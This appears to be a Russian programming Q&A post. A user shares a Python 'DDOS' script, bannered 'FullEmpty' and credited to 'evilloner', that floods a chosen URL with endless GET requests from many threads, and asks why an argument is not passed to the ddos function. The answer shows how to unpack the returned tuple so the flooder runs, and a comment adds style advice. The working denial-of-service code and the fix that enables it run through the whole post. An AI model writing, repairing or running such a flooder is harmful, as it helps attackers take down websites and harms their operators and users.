# Не передается аргумент в функцию ddos

Tags: python, python-3.x

Почему не передается аргумент?

[image: введите сюда описание изображения]

```py
import threading
import requests
import os
import time
from colorama import Fore

url = ""
threads = 1

def logo():
    os.system('cls')
    print(r"  ______     _ _ ______                 _         ")
    print(r" |  ____|   | | |  ____|               | |        ")
    print(r" | |__ _   _| | | |__   _ __ ___  _ __ | |_ _   _ ")
    print(r" |  __| | | | | |  __| | '_ ` _ \| '_ \| __| | | |")
    print(r" | |  | |_| | | | |____| | | | | | |_) | |_| |_| |")
    print(r" |_|   \__,_|_|_|______|_| |_| |_| .__/ \__|\__, |")
    print(r"                                 | |         __/ |")
    print(r"   ver. 1.1 Author: evilloner    |_|        |___/ " + "\n")

def menu(url, threads):
    logo()

    menu = input("1) DDOS 2) DDOS with proxy:\n--> ")

    try:
        if int(menu) == 1:
            logo()
            url = input("URL:\n--> ")

            if not url.__contains__("http"):
                logo()
                exit(Fore.RED + "URL doesnt contains http or https!")

            if not url.__contains__("."):
                logo()
                exit(Fore.RED + "Invalid domain")

            logo()

            try:
                threads = int(input("Threads ?\n--> "))
            except ValueError:
                logo()
                exit(Fore.RED + "Threads count is incorrect!")

            if threads == 0:
                logo()
                exit(Fore.RED + "Threads count is incorrect!")

        elif int(main) == 2:
            logo()
            exit(Fore.RED + "This feature is not yet available")
        else:
            logo()
            exit(Fore.RED + "Incorrect number!!!")
    except ValueError:
        logo()
        exit(Fore.RED + "Incorrect number!!!")

    return(url, threads)

def work(url):
    while True:
        try:
            res = requests.get(url)
            print(Fore.GREEN + "--> Request sent! -->")
        except requests.exceptions.ConnectionError:
            print(Fore.RED + "<-- Connection error! <--")

def ddos(url, threads):
    for i in range(0, threads):
        thr = threading.Thread(target=work, args=(url,))
        thr.start()
    logo()

ddos(menu(url, threads))
```

Comment: Советую не использовать напрямую магические методы, например вместо `not url.__contains__("http")` лучше `"http" not in url`. Скобки в кортеже тоже не нужны, т.е. `return(url, threads)` можно так: `return url, threads`. Для `range` значение `0` является по умолчанию, поэтому можно просто `for i in range(threads)`

Answer (score 4):

Давайте упростим структуру до минимума:

```
def menu(url, threads):
    ...

    return (url, threads)


def ddos(url, threads):
    ...


ddos(menu(url, threads))
```

Как видно, функция `ddos` принимает два параметра и в месте вызова в `ddos` передается результат `menu` -- кортеж `(url, threads)`. Но в таком виде `ddos(menu(url, threads))` в `ddos` тот кортеж попадет одним элементом и в один параметр -- `url`.

Решением будет разворачивание кортежа по параметрам:

```
ddos(*menu(url, threads))
```

Тогда, каждое значение `url, threads` попадет в свой параметр